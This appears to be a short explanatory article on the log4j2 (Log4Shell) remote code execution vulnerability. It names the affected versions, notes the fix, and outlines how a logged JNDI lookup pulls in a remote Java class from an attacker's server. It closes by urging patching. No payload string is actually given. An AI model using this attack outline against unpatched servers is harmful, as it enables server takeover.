The vulnerability is recognized as quite severe, taking into account that it allows getting complete server control and is easy to perform. The library is widely used, so many of the servers were affected. The list of responses from the organizations whose servers were impacted is available here.
The exploit is present in log4j2 versions starting from 2.0 to 2.14.1. Currently, the fix is released as version 2.15.0.
The exploit can be reproduced if the server contains the vulnerable version of the library, has an endpoint with any protocol that allows sending the exploit string, and a log statement that logs out the request with the string.
The attack is performed in the following way:
- The request with malicious string is being sent from the attacker to the server;
- The server records the payload that contains a link to the server, controlled by the attacker. For example:
- The vulnerable server makes a request to the attacker server using Java Naming and Directory Interface (JNDI) and receives a response that includes a link to a remote Java class file;
- The remote Java class file is being injected into the server and allows to execution of any code giving the attacker full access to the server.
So, if you’re using Java software on your servers, it is crucial to get the vulnerability patched as soon as possible.